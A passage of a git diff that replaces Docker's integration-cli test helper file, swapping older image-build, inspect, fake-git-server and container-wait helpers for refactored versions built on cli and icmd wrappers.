0.0.0.0:43712 - container string - image string - ctx *FakeContext -} - -func (f *remoteFileServer) URL() string { - u := url.URL{ - Scheme: "http", - Host: f.host} - return u.String() -} - -func (f *remoteFileServer) CtxDir() string { - return f.ctx.Dir -} - -func (f *remoteFileServer) Close() error { - defer func() { - if f.ctx != nil { - f.ctx.Close() - } - if f.image != "" { - deleteImages(f.image) - } - }() - if f.container == "" { - return nil - } - return deleteContainer(f.container) -} - -func newRemoteFileServer(ctx *FakeContext) (*remoteFileServer, error) { - var ( - image = fmt.Sprintf("fileserver-img-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10))) - container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(stringutils.GenerateRandomAlphaOnlyString(10))) - ) - - if err := ensureHTTPServerImage(); err != nil { - return nil, err - } - - // Build the image - if err := fakeContextAddDockerfile(ctx, `FROM httpserver -COPY . /static`); err != nil { - return nil, fmt.Errorf("Cannot add Dockerfile to context: %v", err) - } - if _, err := buildImageFromContext(image, ctx, false); err != nil { - return nil, fmt.Errorf("failed building file storage container image: %v", err) - } - - // Start the container - runCmd := exec.Command(dockerBinary, "run", "-d", "-P", "--name", container, image) - if out, ec, err := runCommandWithOutput(runCmd); err != nil { - return nil, fmt.Errorf("failed to start file storage container. 
ec=%v\nout=%s\nerr=%v", ec, out, err) - } - - // Find out the system assigned port - out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "port", container, "80/tcp")) - if err != nil { - return nil, fmt.Errorf("failed to find container port: err=%v\nout=%s", err, out) - } - - fileserverHostPort := strings.Trim(out, "\n") - _, port, err := net.SplitHostPort(fileserverHostPort) - if err != nil { - return nil, fmt.Errorf("unable to parse file server host:port: %v", err) - } - - dockerHostURL, err := url.Parse(daemonHost()) - if err != nil { - return nil, fmt.Errorf("unable to parse daemon host URL: %v", err) - } - - host, _, err := net.SplitHostPort(dockerHostURL.Host) - if err != nil { - return nil, fmt.Errorf("unable to parse docker daemon host:port: %v", err) - } - - return &remoteFileServer{ - container: container, - image: image, - host: fmt.Sprintf("%s:%s", host, port), - ctx: ctx}, nil -} - -func inspectFieldAndMarshall(c *check.C, name, field string, output interface{}) { - str := inspectFieldJSON(c, name, field) - err := json.Unmarshal([]byte(str), output) - if c != nil { - c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err)) - } -} - -func inspectFilter(name, filter string) (string, error) { - format := fmt.Sprintf("{{%s}}", filter) - inspectCmd := exec.Command(dockerBinary, "inspect", "-f", format, name) - out, exitCode, err := runCommandWithOutput(inspectCmd) - if err != nil || exitCode != 0 { - return "", fmt.Errorf("failed to inspect %s: %s", name, out) - } - return strings.TrimSpace(out), nil -} - -func inspectFieldWithError(name, field string) (string, error) { - return inspectFilter(name, fmt.Sprintf(".%s", field)) -} - -func inspectField(c *check.C, name, field string) string { - out, err := inspectFilter(name, fmt.Sprintf(".%s", field)) - if c != nil { - c.Assert(err, check.IsNil) - } - return out -} - -func inspectFieldJSON(c *check.C, name, field string) string { - out, err := inspectFilter(name, fmt.Sprintf("json 
.%s", field)) - if c != nil { - c.Assert(err, check.IsNil) - } - return out -} - -func inspectFieldMap(c *check.C, name, path, field string) string { - out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field)) - if c != nil { - c.Assert(err, check.IsNil) - } - return out -} - -func inspectMountSourceField(name, destination string) (string, error) { - m, err := inspectMountPoint(name, destination) - if err != nil { - return "", err - } - return m.Source, nil -} - -func inspectMountPoint(name, destination string) (types.MountPoint, error) { - out, err := inspectFilter(name, "json .Mounts") - if err != nil { - return types.MountPoint{}, err - } - - return inspectMountPointJSON(out, destination) -} - -var errMountNotFound = errors.New("mount point not found") - -func inspectMountPointJSON(j, destination string) (types.MountPoint, error) { - var mp []types.MountPoint - if err := json.Unmarshal([]byte(j), &mp); err != nil { - return types.MountPoint{}, err - } - - var m *types.MountPoint - for _, c := range mp { - if c.Destination == destination { - m = &c - break - } - } - - if m == nil { - return types.MountPoint{}, errMountNotFound - } - - return *m, nil -} - -func inspectImage(name, filter string) (string, error) { - args := []string{"inspect", "--type", "image"} - if filter != "" { - format := fmt.Sprintf("{{%s}}", filter) - args = append(args, "-f", format) - } - args = append(args, name) - inspectCmd := exec.Command(dockerBinary, args...) 
- out, exitCode, err := runCommandWithOutput(inspectCmd) - if err != nil || exitCode != 0 { - return "", fmt.Errorf("failed to inspect %s: %s", name, out) - } - return strings.TrimSpace(out), nil -} - -func getIDByName(name string) (string, error) { - return inspectFieldWithError(name, "Id") -} - -// getContainerState returns the exit code of the container -// and true if it's running -// the exit code should be ignored if it's running -func getContainerState(c *check.C, id string) (int, bool, error) { - var ( - exitStatus int - running bool - ) - out, exitCode := dockerCmd(c, "inspect", "--format={{.State.Running}} {{.State.ExitCode}}", id) - if exitCode != 0 { - return 0, false, fmt.Errorf("%q doesn't exist: %s", id, out) - } - - out = strings.Trim(out, "\n") - splitOutput := strings.Split(out, " ") - if len(splitOutput) != 2 { - return 0, false, fmt.Errorf("failed to get container state: output is broken") - } - if splitOutput[0] == "true" { - running = true - } - if n, err := strconv.Atoi(splitOutput[1]); err == nil { - exitStatus = n - } else { - return 0, false, fmt.Errorf("failed to get container state: couldn't parse integer") - } - - return exitStatus, running, nil -} - -func buildImageCmd(name, dockerfile string, useCache bool, buildFlags ...string) *exec.Cmd { - return buildImageCmdWithHost(name, dockerfile, "", useCache, buildFlags...) -} - -func buildImageCmdWithHost(name, dockerfile, host string, useCache bool, buildFlags ...string) *exec.Cmd { - args := []string{} - if host != "" { - args = append(args, "--host", host) - } - args = append(args, "build", "-t", name) - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, "-") - buildCmd := exec.Command(dockerBinary, args...) 
- buildCmd.Stdin = strings.NewReader(dockerfile) - return buildCmd -} - -func buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, error) { - buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...) - out, exitCode, err := runCommandWithOutput(buildCmd) - if err != nil || exitCode != 0 { - return "", out, fmt.Errorf("failed to build the image: %s", out) - } - id, err := getIDByName(name) - if err != nil { - return "", out, err - } - return id, out, nil -} - -func buildImageWithStdoutStderr(name, dockerfile string, useCache bool, buildFlags ...string) (string, string, string, error) { - buildCmd := buildImageCmd(name, dockerfile, useCache, buildFlags...) - stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) - if err != nil || exitCode != 0 { - return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) - } - id, err := getIDByName(name) - if err != nil { - return "", stdout, stderr, err - } - return id, stdout, stderr, nil -} - -func buildImage(name, dockerfile string, useCache bool, buildFlags ...string) (string, error) { - id, _, err := buildImageWithOut(name, dockerfile, useCache, buildFlags...) - return id, err -} - -func buildImageFromContext(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, error) { - id, _, err := buildImageFromContextWithOut(name, ctx, useCache, buildFlags...) - if err != nil { - return "", err - } - return id, nil -} - -func buildImageFromContextWithOut(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, error) { - args := []string{"build", "-t", name} - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, ".") - buildCmd := exec.Command(dockerBinary, args...) 
- buildCmd.Dir = ctx.Dir - out, exitCode, err := runCommandWithOutput(buildCmd) - if err != nil || exitCode != 0 { - return "", "", fmt.Errorf("failed to build the image: %s", out) - } - id, err := getIDByName(name) - if err != nil { - return "", "", err - } - return id, out, nil -} - -func buildImageFromContextWithStdoutStderr(name string, ctx *FakeContext, useCache bool, buildFlags ...string) (string, string, string, error) { - args := []string{"build", "-t", name} - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, ".") - buildCmd := exec.Command(dockerBinary, args...) - buildCmd.Dir = ctx.Dir - - stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) - if err != nil || exitCode != 0 { - return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) - } - id, err := getIDByName(name) - if err != nil { - return "", stdout, stderr, err - } - return id, stdout, stderr, nil -} - -func buildImageFromGitWithStdoutStderr(name string, ctx *fakeGit, useCache bool, buildFlags ...string) (string, string, string, error) { - args := []string{"build", "-t", name} - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, ctx.RepoURL) - buildCmd := exec.Command(dockerBinary, args...) - - stdout, stderr, exitCode, err := runCommandWithStdoutStderr(buildCmd) - if err != nil || exitCode != 0 { - return "", stdout, stderr, fmt.Errorf("failed to build the image: %s", stdout) - } - id, err := getIDByName(name) - if err != nil { - return "", stdout, stderr, err - } - return id, stdout, stderr, nil -} - -func buildImageFromPath(name, path string, useCache bool, buildFlags ...string) (string, error) { - args := []string{"build", "-t", name} - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, buildFlags...) - args = append(args, path) - buildCmd := exec.Command(dockerBinary, args...) 
- out, exitCode, err := runCommandWithOutput(buildCmd) - if err != nil || exitCode != 0 { - return "", fmt.Errorf("failed to build the image: %s", out) - } - return getIDByName(name) -} - -type gitServer interface { - URL() string - Close() error -} - -type localGitServer struct { - *httptest.Server -} - -func (r *localGitServer) Close() error { - r.Server.Close() - return nil -} - -func (r *localGitServer) URL() string { - return r.Server.URL -} - -type fakeGit struct { - root string - server gitServer - RepoURL string -} - -func (g *fakeGit) Close() { - g.server.Close() - os.RemoveAll(g.root) -} - -func newFakeGit(name string, files map[string]string, enforceLocalServer bool) (*fakeGit, error) { - ctx, err := fakeContextWithFiles(files) - if err != nil { - return nil, err - } - defer ctx.Close() - curdir, err := os.Getwd() - if err != nil { - return nil, err - } - defer os.Chdir(curdir) - - if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to init repo: %s (%s)", err, output) - } - err = os.Chdir(ctx.Dir) - if err != nil { - return nil, err - } - if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to set 'user.name': %s (%s)", err, output) - } - if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to set 'user.email': %s (%s)", err, output) - } - if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to add files to repo: %s (%s)", err, output) - } - if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil { - return nil, fmt.Errorf("error trying to commit to repo: %s (%s)", err, output) - } - - root, err := ioutil.TempDir("", "docker-test-git-repo") - if err != nil { - return nil, 
err - } - repoPath := filepath.Join(root, name+".git") - if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil { - os.RemoveAll(root) - return nil, fmt.Errorf("error trying to clone --bare: %s (%s)", err, output) - } - err = os.Chdir(repoPath) - if err != nil { - os.RemoveAll(root) - return nil, err - } - if output, err := exec.Command("git", "update-server-info").CombinedOutput(); err != nil { - os.RemoveAll(root) - return nil, fmt.Errorf("error trying to git update-server-info: %s (%s)", err, output) - } - err = os.Chdir(curdir) - if err != nil { - os.RemoveAll(root) - return nil, err - } - - var server gitServer - if !enforceLocalServer { - // use fakeStorage server, which might be local or remote (at test daemon) - server, err = fakeStorageWithContext(fakeContextFromDir(root)) - if err != nil { - return nil, fmt.Errorf("cannot start fake storage: %v", err) - } - } else { - // always start a local http server on CLI test machine - httpServer := httptest.NewServer(http.FileServer(http.Dir(root))) - server = &localGitServer{httpServer} - } - return &fakeGit{ - root: root, - server: server, - RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name), - }, nil -} - -// Write `content` to the file at path `dst`, creating it if necessary, -// as well as any missing directories. -// The file is truncated if it already exists. -// Fail the test when error occurs. -func writeFile(dst, content string, c *check.C) { - // Create subdirectories if necessary - c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil) - f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700) - c.Assert(err, check.IsNil) - defer f.Close() - // Write content (truncate if it exists) - _, err = io.Copy(f, strings.NewReader(content)) - c.Assert(err, check.IsNil) -} - -// Return the contents of file at path `src`. -// Fail the test when error occurs. 
-func readFile(src string, c *check.C) (content string) { - data, err := ioutil.ReadFile(src) - c.Assert(err, check.IsNil) - - return string(data) -} - -func containerStorageFile(containerID, basename string) string { - return filepath.Join(containerStoragePath, containerID, basename) -} - -// docker commands that use this function must be run with the '-d' switch. -func runCommandAndReadContainerFile(filename string, cmd *exec.Cmd) ([]byte, error) { - out, _, err := runCommandWithOutput(cmd) - if err != nil { - return nil, fmt.Errorf("%v: %q", err, out) - } - - contID := strings.TrimSpace(out) - - if err := waitRun(contID); err != nil { - return nil, fmt.Errorf("%v: %q", contID, err) - } - - return readContainerFile(contID, filename) -} - -func readContainerFile(containerID, filename string) ([]byte, error) { - f, err := os.Open(containerStorageFile(containerID, filename)) - if err != nil { - return nil, err - } - defer f.Close() - - content, err := ioutil.ReadAll(f) - if err != nil { - return nil, err - } - - return content, nil -} - -func readContainerFileWithExec(containerID, filename string) ([]byte, error) { - out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "exec", containerID, "cat", filename)) - return []byte(out), err -} - -// daemonTime provides the current time on the daemon host -func daemonTime(c *check.C) time.Time { - if isLocalDaemon { - return time.Now() - } - - status, body, err := sockRequest("GET", "/info", nil) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - - type infoJSON struct { - SystemTime string - } - var info infoJSON - err = json.Unmarshal(body, &info) - c.Assert(err, check.IsNil, check.Commentf("unable to unmarshal GET /info response")) - - dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) - c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response")) - return dt -} - -// daemonUnixTime returns the current time on the daemon host with nanoseconds 
precision. -// It return the time formatted how the client sends timestamps to the server. -func daemonUnixTime(c *check.C) string { - return parseEventTime(daemonTime(c)) -} - -func parseEventTime(t time.Time) string { - return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())) -} - -func setupRegistry(c *check.C, schema1 bool, auth, tokenURL string) *testRegistryV2 { - reg, err := newTestRegistryV2(c, schema1, auth, tokenURL) - c.Assert(err, check.IsNil) - - // Wait for registry to be ready to serve requests. - for i := 0; i != 50; i++ { - if err = reg.Ping(); err == nil { - break - } - time.Sleep(100 * time.Millisecond) - } - - c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for test registry to become available: %v", err)) - return reg -} - -func setupNotary(c *check.C) *testNotary { - ts, err := newTestNotary(c) - c.Assert(err, check.IsNil) - - return ts -} - -// appendBaseEnv appends the minimum set of environment variables to exec the -// docker cli binary for testing with correct configuration to the given env -// list. -func appendBaseEnv(isTLS bool, env ...string) []string { - preserveList := []string{ - // preserve remote test host - "DOCKER_HOST", - - // windows: requires preserving SystemRoot, otherwise dial tcp fails - // with "GetAddrInfoW: A non-recoverable error occurred during a database lookup." 
- "SystemRoot", - - // testing help text requires the $PATH to dockerd is set - "PATH", - } - if isTLS { - preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH") - } - - for _, key := range preserveList { - if val := os.Getenv(key); val != "" { - env = append(env, fmt.Sprintf("%s=%s", key, val)) - } - } - return env -} - -func createTmpFile(c *check.C, content string) string { - f, err := ioutil.TempFile("", "testfile") - c.Assert(err, check.IsNil) - - filename := f.Name() - - err = ioutil.WriteFile(filename, []byte(content), 0644) - c.Assert(err, check.IsNil) - - return filename -} - -func buildImageWithOutInDamon(socket string, name, dockerfile string, useCache bool) (string, error) { - args := []string{"--host", socket} - buildCmd := buildImageCmdArgs(args, name, dockerfile, useCache) - out, exitCode, err := runCommandWithOutput(buildCmd) - if err != nil || exitCode != 0 { - return out, fmt.Errorf("failed to build the image: %s, error: %v", out, err) - } - return out, nil -} - -func buildImageCmdArgs(args []string, name, dockerfile string, useCache bool) *exec.Cmd { - args = append(args, []string{"-D", "build", "-t", name}...) - if !useCache { - args = append(args, "--no-cache") - } - args = append(args, "-") - buildCmd := exec.Command(dockerBinary, args...) - buildCmd.Stdin = strings.NewReader(dockerfile) - return buildCmd - -} - -func waitForContainer(contID string, args ...string) error { - args = append([]string{dockerBinary, "run", "--name", contID}, args...) - result := icmd.RunCmd(icmd.Cmd{Command: args}) - if result.Error != nil { - return result.Error - } - return waitRun(contID) -} - -// waitRestart will wait for the specified container to restart once -func waitRestart(contID string, duration time.Duration) error { - return waitInspect(contID, "{{.RestartCount}}", "1", duration) -} - -// waitRun will wait for the specified container to be running, maximum 5 seconds. 
-func waitRun(contID string) error { - return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second) -} - -// waitExited will wait for the specified container to state exit, subject -// to a maximum time limit in seconds supplied by the caller -func waitExited(contID string, duration time.Duration) error { - return waitInspect(contID, "{{.State.Status}}", "exited", duration) -} - -// waitInspect will wait for the specified container to have the specified string -// in the inspect output. It will wait until the specified timeout (in seconds) -// is reached. -func waitInspect(name, expr, expected string, timeout time.Duration) error { - return waitInspectWithArgs(name, expr, expected, timeout) -} - -func waitInspectWithArgs(name, expr, expected string, timeout time.Duration, arg ...string) error { - after := time.After(timeout) - - args := append(arg, "inspect", "-f", expr, name) - for { - result := icmd.RunCommand(dockerBinary, args...) - if result.Error != nil { - if !strings.Contains(result.Stderr(), "No such") { - return fmt.Errorf("error executing docker inspect: %v\n%s", - result.Stderr(), result.Stdout()) - } - select { - case <-after: - return result.Error - default: - time.Sleep(10 * time.Millisecond) - continue - } - } - - out := strings.TrimSpace(result.Stdout()) - if out == expected { - break - } - - select { - case <-after: - return fmt.Errorf("condition \"%q == %q\" not true in time", out, expected) - default: - } - - time.Sleep(100 * time.Millisecond) - } - return nil -} - -func getInspectBody(c *check.C, version, id string) []byte { - endpoint := fmt.Sprintf("/%s/containers/%s/json", version, id) - status, body, err := sockRequest("GET", endpoint, nil) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusOK) - return body -} - -// Run a long running idle task in a background container using the -// system-specific default image and command. 
-func runSleepingContainer(c *check.C, extraArgs ...string) (string, int) { - return runSleepingContainerInImage(c, defaultSleepImage, extraArgs...) -} - -// Run a long running idle task in a background container using the specified -// image and the system-specific command. -func runSleepingContainerInImage(c *check.C, image string, extraArgs ...string) (string, int) { - args := []string{"run", "-d"} - args = append(args, extraArgs...) - args = append(args, image) - args = append(args, sleepCommandForDaemonPlatform()...) - return dockerCmd(c, args...) -} - -func getRootUIDGID() (int, int, error) { - uidgid := strings.Split(filepath.Base(dockerBasePath), ".") - if len(uidgid) == 1 { - //user namespace remapping is not turned on; return 0 - return 0, 0, nil - } - uid, err := strconv.Atoi(uidgid[0]) - if err != nil { - return 0, 0, err - } - gid, err := strconv.Atoi(uidgid[1]) - if err != nil { - return 0, 0, err - } - return uid, gid, nil -} - -// minimalBaseImage returns the name of the minimal base image for the current -// daemon platform. 
-func minimalBaseImage() string { - if daemonPlatform == "windows" { - return WindowsBaseImage - } - return "scratch" -} - -func getGoroutineNumber() (int, error) { - i := struct { - NGoroutines int - }{} - status, b, err := sockRequest("GET", "/info", nil) - if err != nil { - return 0, err - } - if status != http.StatusOK { - return 0, fmt.Errorf("http status code: %d", status) - } - if err := json.Unmarshal(b, &i); err != nil { - return 0, err - } - return i.NGoroutines, nil -} - -func waitForGoroutines(expected int) error { - t := time.After(30 * time.Second) - for { - select { - case <-t: - n, err := getGoroutineNumber() - if err != nil { - return err - } - if n > expected { - return fmt.Errorf("leaked goroutines: expected less than or equal to %d, got: %d", expected, n) - } - default: - n, err := getGoroutineNumber() - if err != nil { - return err - } - if n <= expected { - return nil - } - time.Sleep(200 * time.Millisecond) - } - } -} - -// getErrorMessage returns the error message from an error API response -func getErrorMessage(c *check.C, body []byte) string { - var resp types.ErrorResponse - c.Assert(json.Unmarshal(body, &resp), check.IsNil) - return strings.TrimSpace(resp.Message) -} - -func waitAndAssert(c *check.C, timeout time.Duration, f checkF, checker check.Checker, args ...interface{}) { - after := time.After(timeout) - for { - v, comment := f(c) - assert, _ := checker.Check(append([]interface{}{v}, args...), checker.Info().Params) - select { - case <-after: - assert = true - default: - } - if assert { - if comment != nil { - args = append(args, comment) - } - c.Assert(v, checker, args...) 
- return - } - time.Sleep(100 * time.Millisecond) - } -} - -type checkF func(*check.C) (interface{}, check.CommentInterface) -type reducer func(...interface{}) interface{} - -func reducedCheck(r reducer, funcs ...checkF) checkF { - return func(c *check.C) (interface{}, check.CommentInterface) { - var values []interface{} - var comments []string - for _, f := range funcs { - v, comment := f(c) - values = append(values, v) - if comment != nil { - comments = append(comments, comment.CheckCommentString()) - } - } - return r(values...), check.Commentf("%v", strings.Join(comments, ", ")) - } -} - -func sumAsIntegers(vals ...interface{}) interface{} { - var s int - for _, v := range vals { - s += v.(int) - } - return s -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go b/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go new file mode 100644 index 0000000000..1c05bf5d04 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_utils_test.go @@ -0,0 +1,466 @@ +package main + +import ( + "context" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "path" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/daemon" + "github.com/docker/docker/internal/test/request" + "github.com/go-check/check" + "gotest.tools/icmd" +) + +// Deprecated +func daemonHost() string { + return request.DaemonHost() +} + +func deleteImages(images ...string) error { + args := []string{dockerBinary, "rmi", "-f"} + return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error +} + +// Deprecated: use cli.Docker or cli.DockerCmd +func dockerCmdWithError(args ...string) (string, int, error) { + result := cli.Docker(cli.Args(args...)) + if result.Error != nil { + return result.Combined(), 
result.ExitCode, result.Compare(icmd.Success) + } + return result.Combined(), result.ExitCode, result.Error +} + +// Deprecated: use cli.Docker or cli.DockerCmd +func dockerCmd(c *check.C, args ...string) (string, int) { + result := cli.DockerCmd(c, args...) + return result.Combined(), result.ExitCode +} + +// Deprecated: use cli.Docker or cli.DockerCmd +func dockerCmdWithResult(args ...string) *icmd.Result { + return cli.Docker(cli.Args(args...)) +} + +func findContainerIP(c *check.C, id string, network string) string { + out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id) + return strings.Trim(out, " \r\n'") +} + +func getContainerCount(c *check.C) int { + const containers = "Containers:" + + result := icmd.RunCommand(dockerBinary, "info") + result.Assert(c, icmd.Success) + + lines := strings.Split(result.Combined(), "\n") + for _, line := range lines { + if strings.Contains(line, containers) { + output := strings.TrimSpace(line) + output = strings.TrimLeft(output, containers) + output = strings.Trim(output, " ") + containerCount, err := strconv.Atoi(output) + c.Assert(err, checker.IsNil) + return containerCount + } + } + return 0 +} + +func inspectFieldAndUnmarshall(c *check.C, name, field string, output interface{}) { + str := inspectFieldJSON(c, name, field) + err := json.Unmarshal([]byte(str), output) + if c != nil { + c.Assert(err, check.IsNil, check.Commentf("failed to unmarshal: %v", err)) + } +} + +// Deprecated: use cli.Inspect +func inspectFilter(name, filter string) (string, error) { + format := fmt.Sprintf("{{%s}}", filter) + result := icmd.RunCommand(dockerBinary, "inspect", "-f", format, name) + if result.Error != nil || result.ExitCode != 0 { + return "", fmt.Errorf("failed to inspect %s: %s", name, result.Combined()) + } + return strings.TrimSpace(result.Combined()), nil +} + +// Deprecated: use cli.Inspect +func inspectFieldWithError(name, field string) (string, error) { + return 
inspectFilter(name, fmt.Sprintf(".%s", field)) +} + +// Deprecated: use cli.Inspect +func inspectField(c *check.C, name, field string) string { + out, err := inspectFilter(name, fmt.Sprintf(".%s", field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +// Deprecated: use cli.Inspect +func inspectFieldJSON(c *check.C, name, field string) string { + out, err := inspectFilter(name, fmt.Sprintf("json .%s", field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +// Deprecated: use cli.Inspect +func inspectFieldMap(c *check.C, name, path, field string) string { + out, err := inspectFilter(name, fmt.Sprintf("index .%s %q", path, field)) + if c != nil { + c.Assert(err, check.IsNil) + } + return out +} + +// Deprecated: use cli.Inspect +func inspectMountSourceField(name, destination string) (string, error) { + m, err := inspectMountPoint(name, destination) + if err != nil { + return "", err + } + return m.Source, nil +} + +// Deprecated: use cli.Inspect +func inspectMountPoint(name, destination string) (types.MountPoint, error) { + out, err := inspectFilter(name, "json .Mounts") + if err != nil { + return types.MountPoint{}, err + } + + return inspectMountPointJSON(out, destination) +} + +var errMountNotFound = errors.New("mount point not found") + +// Deprecated: use cli.Inspect +func inspectMountPointJSON(j, destination string) (types.MountPoint, error) { + var mp []types.MountPoint + if err := json.Unmarshal([]byte(j), &mp); err != nil { + return types.MountPoint{}, err + } + + var m *types.MountPoint + for _, c := range mp { + if c.Destination == destination { + m = &c + break + } + } + + if m == nil { + return types.MountPoint{}, errMountNotFound + } + + return *m, nil +} + +// Deprecated: use cli.Inspect +func inspectImage(c *check.C, name, filter string) string { + args := []string{"inspect", "--type", "image"} + if filter != "" { + format := fmt.Sprintf("{{%s}}", filter) + args = append(args, "-f", format) + } + args = 
append(args, name) + result := icmd.RunCommand(dockerBinary, args...) + result.Assert(c, icmd.Success) + return strings.TrimSpace(result.Combined()) +} + +func getIDByName(c *check.C, name string) string { + id, err := inspectFieldWithError(name, "Id") + c.Assert(err, checker.IsNil) + return id +} + +// Deprecated: use cli.Build +func buildImageSuccessfully(c *check.C, name string, cmdOperators ...cli.CmdOperator) { + buildImage(name, cmdOperators...).Assert(c, icmd.Success) +} + +// Deprecated: use cli.Build +func buildImage(name string, cmdOperators ...cli.CmdOperator) *icmd.Result { + return cli.Docker(cli.Build(name), cmdOperators...) +} + +// Write `content` to the file at path `dst`, creating it if necessary, +// as well as any missing directories. +// The file is truncated if it already exists. +// Fail the test when error occurs. +func writeFile(dst, content string, c *check.C) { + // Create subdirectories if necessary + c.Assert(os.MkdirAll(path.Dir(dst), 0700), check.IsNil) + f, err := os.OpenFile(dst, os.O_CREATE|os.O_RDWR|os.O_TRUNC, 0700) + c.Assert(err, check.IsNil) + defer f.Close() + // Write content (truncate if it exists) + _, err = io.Copy(f, strings.NewReader(content)) + c.Assert(err, check.IsNil) +} + +// Return the contents of file at path `src`. +// Fail the test when error occurs. +func readFile(src string, c *check.C) (content string) { + data, err := ioutil.ReadFile(src) + c.Assert(err, check.IsNil) + + return string(data) +} + +func containerStorageFile(containerID, basename string) string { + return filepath.Join(testEnv.PlatformDefaults.ContainerStoragePath, containerID, basename) +} + +// docker commands that use this function must be run with the '-d' switch. +func runCommandAndReadContainerFile(c *check.C, filename string, command string, args ...string) []byte { + result := icmd.RunCommand(command, args...) 
+ result.Assert(c, icmd.Success) + contID := strings.TrimSpace(result.Combined()) + if err := waitRun(contID); err != nil { + c.Fatalf("%v: %q", contID, err) + } + return readContainerFile(c, contID, filename) +} + +func readContainerFile(c *check.C, containerID, filename string) []byte { + f, err := os.Open(containerStorageFile(containerID, filename)) + c.Assert(err, checker.IsNil) + defer f.Close() + + content, err := ioutil.ReadAll(f) + c.Assert(err, checker.IsNil) + return content +} + +func readContainerFileWithExec(c *check.C, containerID, filename string) []byte { + result := icmd.RunCommand(dockerBinary, "exec", containerID, "cat", filename) + result.Assert(c, icmd.Success) + return []byte(result.Combined()) +} + +// daemonTime provides the current time on the daemon host +func daemonTime(c *check.C) time.Time { + if testEnv.IsLocalDaemon() { + return time.Now() + } + cli, err := client.NewEnvClient() + c.Assert(err, check.IsNil) + defer cli.Close() + + info, err := cli.Info(context.Background()) + c.Assert(err, check.IsNil) + + dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) + c.Assert(err, check.IsNil, check.Commentf("invalid time format in GET /info response")) + return dt +} + +// daemonUnixTime returns the current time on the daemon host with nanoseconds precision. +// It return the time formatted how the client sends timestamps to the server. +func daemonUnixTime(c *check.C) string { + return parseEventTime(daemonTime(c)) +} + +func parseEventTime(t time.Time) string { + return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())) +} + +// appendBaseEnv appends the minimum set of environment variables to exec the +// docker cli binary for testing with correct configuration to the given env +// list. 
+func appendBaseEnv(isTLS bool, env ...string) []string { + preserveList := []string{ + // preserve remote test host + "DOCKER_HOST", + + // windows: requires preserving SystemRoot, otherwise dial tcp fails + // with "GetAddrInfoW: A non-recoverable error occurred during a database lookup." + "SystemRoot", + + // testing help text requires the $PATH to dockerd is set + "PATH", + } + if isTLS { + preserveList = append(preserveList, "DOCKER_TLS_VERIFY", "DOCKER_CERT_PATH") + } + + for _, key := range preserveList { + if val := os.Getenv(key); val != "" { + env = append(env, fmt.Sprintf("%s=%s", key, val)) + } + } + return env +} + +func createTmpFile(c *check.C, content string) string { + f, err := ioutil.TempFile("", "testfile") + c.Assert(err, check.IsNil) + + filename := f.Name() + + err = ioutil.WriteFile(filename, []byte(content), 0644) + c.Assert(err, check.IsNil) + + return filename +} + +// waitRun will wait for the specified container to be running, maximum 5 seconds. +// Deprecated: use cli.WaitFor +func waitRun(contID string) error { + return waitInspect(contID, "{{.State.Running}}", "true", 5*time.Second) +} + +// waitInspect will wait for the specified container to have the specified string +// in the inspect output. It will wait until the specified timeout (in seconds) +// is reached. +// Deprecated: use cli.WaitFor +func waitInspect(name, expr, expected string, timeout time.Duration) error { + return waitInspectWithArgs(name, expr, expected, timeout) +} + +// Deprecated: use cli.WaitFor +func 